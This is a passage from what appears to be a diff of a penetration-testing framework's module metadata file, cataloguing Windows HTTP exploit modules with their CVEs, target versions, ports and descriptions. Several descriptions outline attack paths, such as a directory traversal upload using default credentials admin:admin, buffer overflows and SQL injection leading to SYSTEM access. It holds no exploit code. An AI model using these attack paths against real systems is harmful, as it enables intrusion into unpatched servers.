By specifying\n an overly long string to the 'app' parameter, SeH can be\n reliably overwritten allowing for arbitrary remote code execution.\n In addition, it is possible to overwrite EIP by specifying\n an arbitrary parameter name with an '=' terminator.", - "references": [ - "OSVDB-66814", - "BID-42293", - "URL-http://www.aushack.com/advisories/" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro All - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb", - "is_install_path": true, - "ref_name": "windows/http/amlibweb_webquerydll_app", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_activemq_traversal_upload": { - "name": "Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload", - "fullname": "exploit/windows/http/apache_activemq_traversal_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-08-19", - "type": "exploit", - "author": [ - "David Jorm", - "Erik Wynter" - ], - "description": "This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache\n ActiveMQ 5.x before 5.11.2 for Windows.\n\n The module tries to upload a JSP payload to the /admin directory via the traversal\n path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ\n credentials admin:admin (or other credentials provided by the user). 
It then issues\n an HTTP GET request to /admin/.jsp on the target in order to trigger the\n payload and obtain a shell.", - "references": [ - "CVE-2015-1830", - "EDB-40857", - "URL-https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 8161, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Java" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/apache_activemq_traversal_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_activemq_traversal_upload", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_chunked": { - "name": "Apache Win32 Chunked Encoding", - "fullname": "exploit/windows/http/apache_chunked", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-06-19", - "type": "exploit", - "author": [ - "hdm ", - "jduck " - ], - "description": "This module exploits the chunked transfer integer wrap\n vulnerability in Apache version 1.2.x to 1.3.24. This\n particular module has been tested with all versions of the\n official Win32 build between 1.3.9 and 1.3.24. Additionally,\n it should work against most co-branded and bundled versions\n of Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n You will need to use the Check() functionality to determine\n the exact target version prior to launching the exploit. 
The\n version of Apache bundled with Oracle 8.1.7 will not\n automatically restart, so if you use the wrong target value,\n the server will crash.", - "references": [ - "CVE-2002-0392", - "OSVDB-838", - "BID-5033" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Generic Bruteforce", - "Apache.org Build 1.3.9->1.3.19", - "Apache.org Build 1.3.22->1.3.24", - "Apache.org Build 1.3.19->1.3.24", - "Apache.org Build 1.3.22", - "Apache.org Build 1.3.17->1.3.24 (Windows 2000)", - "Apache.org Build 1.3.17->1.3.24 (Windows NT)", - "Windows 2003 English SP0", - "Windows 2000 English", - "Oracle 8.1.7 Apache 1.3.12", - "Oracle 9.1.0 Apache 1.3.12", - "Oracle 9.2.0 Apache 1.3.22", - "Debugging Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/apache_chunked.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_chunked", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_mod_rewrite_ldap": { - "name": "Apache Module mod_rewrite LDAP Protocol Buffer Overflow", - "fullname": "exploit/windows/http/apache_mod_rewrite_ldap", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-07-28", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits the mod_rewrite LDAP protocol scheme handling\n flaw discovered by Mark Dowd, which produces an off-by-one overflow.\n Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n This module requires REWRITEPATH to be set accurately. 
In addition,\n the target must have 'RewriteEngine on' configured, with a specific\n 'RewriteRule' condition enabled to allow for exploitation.\n\n The flaw affects multiple platforms, however this module currently\n only supports Windows based installations.", - "references": [ - "CVE-2006-3747", - "OSVDB-27588", - "BID-19204", - "URL-http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html", - "EDB-3680", - "EDB-3996", - "EDB-2237" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_mod_rewrite_ldap", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_modjk_overflow": { - "name": "Apache mod_jk 1.2.20 Buffer Overflow", - "fullname": "exploit/windows/http/apache_modjk_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-03-02", - "type": "exploit", - "author": [ - "Nicob " - ], - "description": "This is a stack buffer overflow exploit for mod_jk 1.2.20.\n Should work on any Win32 OS.", - "references": [ - "CVE-2007-0774", - "OSVDB-33855", - "BID-22791", - "ZDI-07-008" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/apache_modjk_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_modjk_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, 
- "needs_cleanup": null - }, - "exploit_windows/http/apache_tika_jp2_jscript": { - "name": "Apache Tika Header Command Injection", - "fullname": "exploit/windows/http/apache_tika_jp2_jscript", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-04-25", - "type": "exploit", - "author": [ - "h00die", - "David Yesland", - "Tim Allison" - ], - "description": "This module exploits a command injection vulnerability in Apache\n Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is\n used to bypass magic bytes checking. When OCR is specified in the\n request, parameters can be passed to change the parameters passed\n at command line to allow for arbitrary JScript to execute. A\n JScript stub is passed to execute arbitrary code. This module was\n verified against version 1.15 - 1.17 on Windows 2012.\n While the CVE and finding show more versions vulnerable, during\n testing it was determined only > 1.14 was exploitable due to\n jp2 support being added.", - "references": [ - "EDB-46540", - "URL-https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/", - "URL-https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E", - "CVE-2018-1335" - ], - "platform": "Windows", - "arch": "", - "rport": 9998, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/apache_tika_jp2_jscript.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_tika_jp2_jscript", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/avaya_ccr_imageupload_exec": { - "name": "Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution", - 
"fullname": "exploit/windows/http/avaya_ccr_imageupload_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-28", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits an authentication bypass vulnerability on Avaya IP Office\n Customer Call Reporter, which allows a remote user to upload arbitrary files\n through the ImageUpload.ashx component. It can be abused to upload and execute\n arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP\n Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.", - "references": [ - "CVE-2012-3811", - "OSVDB-83399", - "BID-54225", - "URL-https://downloads.avaya.com/css/P8/documents/100164021", - "ZDI-12-106" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2" - ], - "mod_time": "2019-08-02 09:48:53 +0000", - "path": "/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/avaya_ccr_imageupload_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/badblue_ext_overflow": { - "name": "BadBlue 2.5 EXT.dll Buffer Overflow", - "fullname": "exploit/windows/http/badblue_ext_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-04-20", - "type": "exploit", - "author": [ - "acaro " - ], - "description": "This is a stack buffer overflow exploit for BadBlue version 2.5.", - "references": [ - "CVE-2005-0595", - "OSVDB-14238", - "BID-7387" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 
8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "BadBlue 2.5 (Universal)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/badblue_ext_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/badblue_ext_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/badblue_passthru": { - "name": "BadBlue 2.72b PassThru Buffer Overflow", - "fullname": "exploit/windows/http/badblue_passthru", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-12-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the PassThru\n functionality in ext.dll in BadBlue 2.72b and earlier.", - "references": [ - "CVE-2007-6377", - "OSVDB-42416", - "BID-26803" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "BadBlue EE 2.7 Universal", - "BadBlue 2.72b Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/badblue_passthru.rb", - "is_install_path": true, - "ref_name": "windows/http/badblue_passthru", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/bea_weblogic_jsessionid": { - "name": "BEA WebLogic JSESSIONID Cookie Value Overflow", - "fullname": "exploit/windows/http/bea_weblogic_jsessionid", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-01-13", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable\n code is only accessible when clustering is configured. 
A request containing a\n long JSESSION cookie value can lead to arbitrary code execution.", - "references": [ - "CVE-2008-5457", - "OSVDB-51311" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Apache 2.2 - WebLogic module version 1.0.1136334", - "Windows Apache 2.2 - WebLogic module version 1.0.1150354" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/bea_weblogic_jsessionid.rb", - "is_install_path": true, - "ref_name": "windows/http/bea_weblogic_jsessionid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/bea_weblogic_post_bof": { - "name": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", - "fullname": "exploit/windows/http/bea_weblogic_post_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-07-17", - "type": "exploit", - "author": [ - "KingCope", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin.\n\n The connector fails to properly handle specially crafted HTTP POST\n requests, resulting a buffer overflow due to the insecure usage\n of sprintf. 
Currently, this module works over Windows systems without DEP,\n and has been tested with Windows 2000 / XP.\n\n In addition, the Weblogic Apache plugin version is fingerprinted with a POST\n request containing a specially crafted Transfer-Encoding header.", - "references": [ - "CVE-2008-3257", - "OSVDB-47096", - "BID-30273" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", - "BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", - "BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/bea_weblogic_post_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/bea_weblogic_post_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/bea_weblogic_transfer_encoding": { - "name": "BEA Weblogic Transfer-Encoding Buffer Overflow", - "fullname": "exploit/windows/http/bea_weblogic_transfer_encoding", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-09-09", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin. 
This vulnerability exists in the\n error reporting for unknown Transfer-Encoding headers.\n You may have to run this twice due to timing issues with handlers.", - "references": [ - "CVE-2008-4008", - "OSVDB-49283" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Apache 2.2 version Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb", - "is_install_path": true, - "ref_name": "windows/http/bea_weblogic_transfer_encoding", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/belkin_bulldog": { - "name": "Belkin Bulldog Plus Web Service Buffer Overflow", - "fullname": "exploit/windows/http/belkin_bulldog", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-03-08", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Belkin Bulldog Plus\n 4.0.2 build 1219. 
When sending a specially crafted http request,\n an attacker may be able to execute arbitrary code.", - "references": [ - "OSVDB-54395", - "BID-34033", - "EDB-8173" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/belkin_bulldog.rb", - "is_install_path": true, - "ref_name": "windows/http/belkin_bulldog", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ca_arcserve_rpc_authbypass": { - "name": "CA Arcserve D2D GWT RPC Credential Information Disclosure", - "fullname": "exploit/windows/http/ca_arcserve_rpc_authbypass", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-07-25", - "type": "exploit", - "author": [ - "bannedit ", - "rgod" - ], - "description": "This module exploits an information disclosure vulnerability in the CA Arcserve\n D2D r15 web server. The information disclosure can be triggered by sending a\n specially crafted RPC request to the homepage servlet. This causes CA Arcserve to\n disclosure the username and password in cleartext used for authentication. 
This\n username and password pair are Windows credentials with Administrator access.", - "references": [ - "CVE-2011-3011", - "OSVDB-74162", - "EDB-17574" - ], - "platform": "Windows", - "arch": "", - "rport": 8014, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb", - "is_install_path": true, - "ref_name": "windows/http/ca_arcserve_rpc_authbypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ca_igateway_debug": { - "name": "CA iTechnology iGateway Debug Mode Buffer Overflow", - "fullname": "exploit/windows/http/ca_igateway_debug", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-10-06", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a vulnerability in the Computer Associates\n iTechnology iGateway component. When True is enabled\n in igateway.conf (non-default), it is possible to overwrite the stack\n and execute code remotely. 
This module works best with Ordinal payloads.", - "references": [ - "CVE-2005-3190", - "OSVDB-19920", - "URL-http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485", - "EDB-1243", - "BID-15025" - ], - "platform": "Windows", - "arch": "", - "rport": 5250, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "iGateway 3.0.40621.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ca_igateway_debug.rb", - "is_install_path": true, - "ref_name": "windows/http/ca_igateway_debug", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ca_totaldefense_regeneratereports": { - "name": "CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection", - "fullname": "exploit/windows/http/ca_totaldefense_regeneratereports", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-04-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a SQL injection flaw in CA Total Defense Suite R12.\n When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an\n attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql\n statements into the ReportIDs element.", - "references": [ - "ZDI-11-134", - "OSVDB-74968", - "CVE-2011-1653" - ], - "platform": "Windows", - "arch": "", - "rport": 34443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Universal" - ], - "mod_time": "2022-06-29 19:10:52 +0000", - "path": "/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb", - "is_install_path": true, - "ref_name": "windows/http/ca_totaldefense_regeneratereports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - 
}, - "exploit_windows/http/cayin_xpost_sql_rce": { - "name": "Cayin xPost wayfinder_seqid SQLi to RCE", - "fullname": "exploit/windows/http/cayin_xpost_sql_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-06-04", - "type": "exploit", - "author": [ - "h00die", - "Gjoko Krstic (LiquidWorm) " - ], - "description": "This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. The\n wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can be injected\n with a blind SQLi. Since this app bundles MySQL and apache Tomcat the\n environment is pretty static and therefore the default settings should\n work. Results in SYSTEM level access.\n Only the java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp payloads\n seem to be valid.", - "references": [ - "EDB-48558", - "URL-https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php", - "CVE-2020-7356" - ], - "platform": "Java,Windows", - "arch": "java", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/cayin_xpost_sql_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/cayin_xpost_sql_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/cogent_datahub_command": { - "name": "Cogent DataHub Command Injection", - "fullname": "exploit/windows/http/cogent_datahub_command", - "aliases": [], - "rank": 0, - "disclosure_date": "2014-04-29", - "type": "exploit", - "author": [ - "John Leitch", - "juan vazquez " - ], - "description": "This module exploits an injection vulnerability in Cogent 
DataHub prior\n to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which\n makes insecure use of the datahub_command function with user controlled\n data, allowing execution of arbitrary datahub commands and scripts. This\n module has been tested successfully with Cogent DataHub 7.3.4 on\n Windows 7 SP1. Please also note that after exploitation, the remote service\n will most likely hang and restart manually.", - "references": [ - "ZDI-14-136", - "CVE-2014-3789", - "BID-67486" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Cogent DataHub < 7.3.5" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/cogent_datahub_command.rb", - "is_install_path": true, - "ref_name": "windows/http/cogent_datahub_command", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/cogent_datahub_request_headers_bof": { - "name": "Cogent DataHub HTTP Server Buffer Overflow", - "fullname": "exploit/windows/http/cogent_datahub_request_headers_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-26", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow on Cogent DataHub 7.3.0. The\n vulnerability exists in the HTTP server. While handling HTTP headers, a\n strncpy() function is used in a dangerous way. 
This module has been tested\n successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.", - "references": [ - "CVE-2013-0680", - "OSVDB-95819", - "BID-53455", - "ZDI-13-178", - "URL-http://www.cogentdatahub.com/Info/130712_ZDI-CAN-1915_Response.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 English / Cogent DataHub 7.3.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/cogent_datahub_request_headers_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/coldfusion_fckeditor": { - "name": "ColdFusion 8.0.1 Arbitrary File Upload and Execute", - "fullname": "exploit/windows/http/coldfusion_fckeditor", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-07-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n and Execute vulnerability.", - "references": [ - "CVE-2009-2265", - "OSVDB-55684" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Windows Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/coldfusion_fckeditor.rb", - "is_install_path": true, - "ref_name": "windows/http/coldfusion_fckeditor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/cyclope_ess_sqli": { - 
"name": "Cyclope Employee Surveillance Solution v6 SQL Injection", - "fullname": "exploit/windows/http/cyclope_ess_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-08", - "type": "exploit", - "author": [ - "loneferret", - "sinn3r " - ], - "description": "This module exploits a SQL injection found in Cyclope Employee Surveillance\n Solution. Because the login script does not properly handle the user-supplied\n username parameter, a malicious user can manipulate the SQL query, and allows\n arbitrary code execution under the context of 'SYSTEM'.", - "references": [ - "OSVDB-84517", - "EDB-20393" - ], - "platform": "Windows", - "arch": "", - "rport": 7879, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Cyclope Employee Surveillance Solution v6.2 or older" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/cyclope_ess_sqli.rb", - "is_install_path": true, - "ref_name": "windows/http/cyclope_ess_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/desktopcentral_deserialization": { - "name": "ManageEngine Desktop Central Java Deserialization", - "fullname": "exploit/windows/http/desktopcentral_deserialization", - "aliases": [], - "rank": 500, - "disclosure_date": "2020-03-05", - "type": "exploit", - "author": [ - "mr_me", - "wvu " - ], - "description": "This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n Quoting the vendor's advisory on fixed versions:\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. 
In continuation of\n that, the complete fix for the remote code execution vulnerability is\n now available in build 10.0.479.\"", - "references": [ - "CVE-2020-10189", - "URL-https://srcincite.io/advisories/src-2020-0011/", - "URL-https://srcincite.io/pocs/src-2020-0011.py.txt", - "URL-https://twitter.com/steventseeley/status/1235635108498948096", - "URL-https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 8383, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2023-03-13 10:31:27 +0000", - "path": "/modules/exploits/windows/http/desktopcentral_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/desktopcentral_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [ - "first-attempt-fail" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/desktopcentral_file_upload": { - "name": "ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload", - "fullname": "exploit/windows/http/desktopcentral_file_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-11-11", - "type": "exploit", - "author": [ - "Thomas Hibbert " - ], - "description": "This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to\n v8 build 80293. 
A malicious user can upload a JSP file into the web root without\n authentication, leading to arbitrary code execution as SYSTEM.", - "references": [ - "CVE-2013-7390", - "OSVDB-100008", - "URL-http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf", - "URL-https://seclists.org/fulldisclosure/2013/Nov/130" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Desktop Central v7 - v8 build 80292 / Windows" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/desktopcentral_file_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/desktopcentral_file_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/desktopcentral_statusupdate_upload": { - "name": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload", - "fullname": "exploit/windows/http/desktopcentral_statusupdate_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-08-31", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral\n v7 to v9 build 90054 (including the MSP versions).\n A malicious user can upload a JSP file into the web root without authentication, leading to\n arbitrary code execution as SYSTEM. 
